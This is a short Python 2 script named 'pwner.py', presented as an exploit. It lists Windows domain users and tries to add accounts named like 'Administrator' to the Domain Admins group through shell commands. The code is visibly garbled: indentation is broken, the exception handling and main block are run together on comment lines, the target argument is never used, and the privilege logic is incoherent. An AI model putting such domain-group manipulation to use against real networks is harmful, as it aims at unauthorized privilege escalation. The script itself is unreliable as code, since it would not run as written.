pwner.py

#!/usr/bin/python
import os 
import sys 
import argparse 
import subprocess 
from subprocess import Popen, PIPE, STDOUT


def exploit(target):
    try:
        # Run the command to get the list of users from the target system. 
        command = 'net user /domain'
        # Execute the command. 
        process = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
        # Read and store the output of the command.  
        output = process.stdout.read()
        # Split the output into lines so we can iterate over them.  
        lines = output.split('\n')
        # Iterate over each line in the output and look for users with administrative privileges.  
         for line in lines: 
            if 'Administrator' in line:     # If we find a user with administrative privileges...  
                username = line[0:-1]       # Get their username from the line...  
                print '[+] Found Administrator Account : %s' % (username)    # Print it out...  
                cmd_str = 'net group "Domain Admins" "%s" /add /domain' % (username)    # Create a new command to add them to Domain Admins group...  
                print '[+] Adding User To Domain Admins Group : %s' % (cmd_str)    # Print out our new command...                                                       
                subprocess.call(cmd_str, shell=True)     # Execute our new command!     print '[+] Exploit Completed!'     
                except Exception as e:      print '[-] Something went wrong :('      print e      sys.exit(-1) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("target", help="Target IP or Hostname") args = parser.parse_args() exploit(args